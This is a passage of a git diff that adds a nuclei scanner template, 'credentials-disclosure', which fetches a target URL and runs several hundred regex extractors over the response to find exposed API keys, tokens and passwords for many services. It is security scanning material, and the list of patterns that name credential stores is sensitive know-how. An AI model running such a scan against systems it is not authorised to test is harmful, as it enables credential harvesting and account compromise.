+ - "(?i)api[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)api[_-]?key[_-]?sid(=| =|:| :).{1,32}"
+ - "(?i)api[_-]?key[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)aos[_-]?sec(=| =|:| :).{1,32}"
+ - "(?i)aos[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)ansible[_-]?vault[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)android[_-]?docs[_-]?deploy[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)anaconda[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)amazon[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)amazon[_-]?bucket[_-]?name(=| =|:| :).{1,32}"
+ - "(?i)alicloud[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)alicloud[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)alias[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)algolia[_-]?search[_-]?key[_-]?1(=| =|:| :).{1,32}"
+ - "(?i)algolia[_-]?search[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)algolia[_-]?search[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)algolia[_-]?api[_-]?key[_-]?search(=| =|:| :).{1,32}"
+ - "(?i)algolia[_-]?api[_-]?key[_-]?mcm(=| =|:| :).{1,32}"
+ - "(?i)algolia[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)algolia[_-]?admin[_-]?key[_-]?mcm(=| =|:| :).{1,32}"
+ - "(?i)algolia[_-]?admin[_-]?key[_-]?2(=| =|:| :).{1,32}"
+ - "(?i)algolia[_-]?admin[_-]?key[_-]?1(=| =|:| :).{1,32}"
+ - "(?i)adzerk[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)admin[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)account[_-]?sid(=| =|:| :).{1,32}"
+ - "(?i)access[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)access[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)access[_-]?key[_-]?secret(=| =|:| :).{1,32}"
diff --git a/nuclei-templates/Other/credentials-disclosure-1252.yaml b/nuclei-templates/Other/credentials-disclosure-1252.yaml
new file mode 100644
index 0000000000..e9ecaee0bc
--- /dev/null
+++ b/nuclei-templates/Other/credentials-disclosure-1252.yaml
@@ -0,0 +1,712 @@
+id: credentials-disclosure
+
+info:
+ name: Credentials Disclosure Check
+ author: Sy3Omda,forgedhallpass,geeknik
+ severity: unknown
+ description: Look for keys/tokens/passwords in HTTP responses, exposed keys/tokens/secrets requires manual verification for impact evaluation.
+ tags: exposure,token,key,api,secret,password
+
+# Example cases to match against: https://regex101.com/r/HPtaU2/1
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ redirects: true
+ max-redirects: 2
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "(?i)[\"']?zopim[_-]?account[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?zhuliang[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?zensonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?zendesk[_-]?travis[_-]?github[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?yt[_-]?server[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?yt[_-]?partner[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?yt[_-]?partner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?yt[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?yt[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?yt[_-]?account[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?yt[_-]?account[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?yangshun[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?yangshun[_-]?gh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?www[_-]?googleapis[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?wpt[_-]?ssh[_-]?connect[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?wpt[_-]?report[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?wpt[_-]?prepare[_-]?dir[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?wpt[_-]?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?wpt[_-]?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?wporg[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?wordpress[_-]?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?wordpress[_-]?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?wincert[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?widget[_-]?test[_-]?server[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?widget[_-]?fb[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?5[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?4[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?widget[_-]?basic[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?watson[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?watson[_-]?device[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?watson[_-]?conversation[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?wakatime[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?vscetoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?visual[_-]?recognition[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?virustotal[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?v[_-]?sfdc[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?v[_-]?sfdc[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?usertravis[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?user[_-]?assets[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?user[_-]?assets[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?use[_-]?ssh[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?urban[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?urban[_-]?master[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?urban[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?unity[_-]?serial[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?unity[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?twitteroauthaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?twitteroauthaccesssecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?twitter[_-]?consumer[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?twitter[_-]?consumer[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?twine[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?twilio[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?twilio[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?twilio[_-]?configuration[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?twilio[_-]?chat[_-]?account[_-]?api[_-]?service[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?twilio[_-]?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?twilio[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?trex[_-]?okta[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?trex[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?travis[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?travis[_-]?secure[_-]?env[_-]?vars[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?travis[_-]?pull[_-]?request[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?travis[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?travis[_-]?e2e[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?travis[_-]?com[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?travis[_-]?branch[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?travis[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?travis[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?token[_-]?core[_-]?java[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?thera[_-]?oss[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?tester[_-]?keys[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?test[_-]?test[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?test[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?tesco[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?svn[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?surge[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?surge[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?stripe[_-]?public[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?stripe[_-]?private[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?strip[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?strip[_-]?publishable[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?starship[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?starship[_-]?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?star[_-]?test[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?star[_-]?test[_-]?location[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?star[_-]?test[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?staging[_-]?base[_-]?url[_-]?runscope[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ssmtp[_-]?config[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sshpass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?srcclr[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?square[_-]?reader[_-]?sdk[_-]?repository[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sqssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sqsaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?spring[_-]?mail[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?spotify[_-]?api[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?spotify[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?spaces[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?spaces[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?soundcloud[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?soundcloud[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sonatype[_-]?token[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sonatype[_-]?token[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sonatype[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sonatype[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sonatype[_-]?gpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sonatype[_-]?gpg[_-]?key[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sonar[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sonar[_-]?project[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sonar[_-]?organization[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?socrata[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?socrata[_-]?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?snyk[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?snyk[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?snoowrap[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?snoowrap[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?snoowrap[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?slate[_-]?user[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?slash[_-]?developer[_-]?space[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?slash[_-]?developer[_-]?space[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?signing[_-]?key[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?signing[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?signing[_-]?key[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?signing[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?setsecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?setdstsecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?setdstaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ses[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ses[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?service[_-]?account[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sentry[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sentry[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sentry[_-]?endpoint[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sentry[_-]?default[_-]?org[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sentry[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sendwithus[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sendgrid[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sendgrid[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sendgrid[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sendgrid[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sendgrid[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sendgrid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?selion[_-]?selenium[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?selion[_-]?log[_-]?level[_-]?dev[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?segment[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?key[_-]?base[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?9[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?8[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?7[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?6[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?5[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?4[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?11[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?10[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?secret[_-]?0[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sdr[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
